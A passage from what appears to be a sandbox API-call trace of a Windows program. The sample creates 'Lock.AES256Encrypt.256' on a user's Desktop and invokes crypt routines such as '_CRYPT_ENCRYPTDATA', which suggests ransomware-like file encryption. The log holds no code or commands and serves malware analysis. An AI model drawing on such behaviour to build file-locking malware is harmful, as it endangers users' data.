(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0134.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0134.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0134.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0134.847] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0134.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0134.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0134.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0134.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.848] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0134.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0134.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e90338 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0134.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0134.848] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.AES256Encrypt.256" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.aes256encrypt.256"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0134.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0134.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0134.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.867] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0134.867] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0134.870] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x3800, lpOverlapped=0x0) returned 1 [0134.871] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0134.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be8020 | out: hHeap=0x970000) returned 1 [0134.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0134.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0134.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0134.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0134.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0134.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26008 | out: hHeap=0x970000) returned 1 [0134.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.878] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26008 | out: hHeap=0x970000) returned 1 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0134.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.880] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0134.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0134.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0134.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0134.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0134.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0134.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0134.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13800) returned 0x2f26008 [0134.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0134.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0134.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0134.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13800) returned 0x2ea0340 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0134.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0134.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0134.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0134.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0134.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0134.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0134.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0134.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0134.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0134.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0134.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0134.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0134.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0134.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.898] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0134.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0134.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0134.899] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0134.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0134.899] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0134.899] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0134.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0134.900] PeekMessageW (in: lpMsg=0x8cf158, 